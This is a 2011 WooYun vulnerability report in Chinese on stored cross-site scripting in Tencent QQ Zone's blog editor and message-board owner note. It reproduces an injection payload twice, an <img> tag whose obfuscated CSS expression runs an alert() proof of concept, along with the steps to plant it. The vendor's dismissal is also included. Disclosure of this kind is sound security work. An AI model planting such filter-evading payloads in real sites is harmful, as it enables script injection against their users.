漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2011-03514
漏洞标题:腾讯QQ空间日志编辑器XSS以及留言板主人寄语编辑器XSS
相关厂商:腾讯
漏洞作者: shellcode
提交时间:2011-12-03 16:54
修复时间:2011-12-05 16:45
公开时间:2011-12-05 16:45
漏洞类型:xss跨站脚本攻击
危害等级:中
自评Rank:9
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2011-12-03: 细节已通知厂商并且等待厂商处理中
2011-12-05: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
在弹出窗口是如果不点击确认导致QQ聊天窗口无法运行 直接卡 影响到本机的其他的QQ的聊天窗口的活动
详细说明:
在日志中----高级功能---HTML 插入 <img SRC="http://www.wooyun.org" STYLE="xxx:expressio/*\0*/n(if(!window.x){alert('测试xss BY Shellcode');window.x=1;})" ALT="111" /> 发表即可弹出
在留言板---主人寄语编辑---插入图片---网络图片---图片网址 插入<img SRC="http://www.wooyun.org" STYLE="xxx:expressio/*\0*/n(if(!window.x){alert('测试xss BY Shellcode');window.x=1;})" ALT="111" />
确定即可弹出
漏洞证明:
修复方案:
腾讯里面网络安全高手如云
版权声明:转载请注明来源 shellcode@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2011-12-05 16:45
厂商回复:
经过评估,该问题危害较小,故忽略。仍然感谢您的报告。
漏洞Rank:2 (WooYun评价)
最新状态:
暂无